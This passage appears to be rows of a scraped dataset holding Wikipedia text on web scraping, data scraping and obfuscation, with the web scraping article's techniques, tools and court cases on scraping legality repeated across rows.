all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
427 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Obfuscation | Obfuscation is the obscuring of the intended meaning of communication by making the message difficult to understand, usually with confusing and ambiguous language. The obfuscation might be either unintentional or intentional (although intent usually is connoted), and is accomplished with circumlocution (talking around the subject), the use of jargon (technical language of a profession), and the use of an argot (ingroup language) of limited communicative value to outsiders. 1 In expository writing, unintentional obfuscation usually occurs in draft documents, at the beginning of composition; such obfuscation is illuminated with critical thinking and editorial revision, either by the writer or by an editor. Etymologically, the word obfuscation derives from the Latin obfuscatio, from obfusc re (to darken); synonyms include the words beclouding and abstrusity. Doctors are faulted for using jargon to conceal unpleasant facts from a patient; the American author and physician Michael Crichton said that medical writing is a "highly skilled, calculated attempt to confuse the reader". The psychologist B. F. Skinner said that medical notation is a form of multiple audience control, which allows the doctor to communicate to the pharmacist things which the patient might oppose if they could understand medical jargon. 2 "Eschew obfuscation", also stated as "eschew obfuscation, espouse elucidation", is a humorous fumblerule used by English teachers and professors when lecturing about proper writing techniques. Literally, the phrase means "avoid being unclear" or "avoid being unclear, support being clear", but the use of relatively uncommon words causes confusion in much of the audience (those lacking the vocabulary), making the statement an example of irony, and more precisely a heterological phrase. The phrase has appeared in print at least as early as 1959, when it was used as a section heading in a NASA document. 3 An earlier similar phrase appears in Mark Twain's Fenimore Cooper's Literary Offenses, where he lists rule fourteen of good writing as "eschew surplusage". Obfuscation of oral or written communication achieves a degree of secure communication without a need to rely upon technology. This technique is sometimes referred to as "talking around" and is a form of security through obscurity. A notable example of obfuscation of written communication is a message sent by September 11 attacks ringleader Mohamed Atta to other conspirators prior to the attacks occurring: 4 The semester begins in three more weeks. We've obtained 19 confirmations for studies in the faculty of law, the faculty of urban planning, the faculty of fine arts and the faculty of engineering. In this obfuscated message, the following code words are believed to exist: 5 Within the illegal drug trade, obfuscation is commonly used in communication to hide the occurrence of drug trafficking. A common spoken example is "420", used as a code word for cannabis, a drug which, despite some recent prominent decriminalization changes, remains illegal in most places. The Drug Enforcement Administration reported in July 2018 a total of 353 different code words used for cannabis. 6 In white-box cryptography, obfuscation refers to the protection of cryptographic keys from extraction when they are under the control of the adversary, e.g., as part of a DRM scheme. 7 In network security, obfuscation refers to methods used to obscure an attack payload from inspection by network protection systems. |
428 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_note-10 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
429 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_scraping#cite_ref-2 | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. Computer to user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today update , for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50 year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management, etc.—could be said to be an example of robotic process automation software, called RPA or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24 80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data as numeric data for inclusion into calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation to these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport storage mechanism between the client and the webserver. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner. 7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
430 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_ref-18 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a 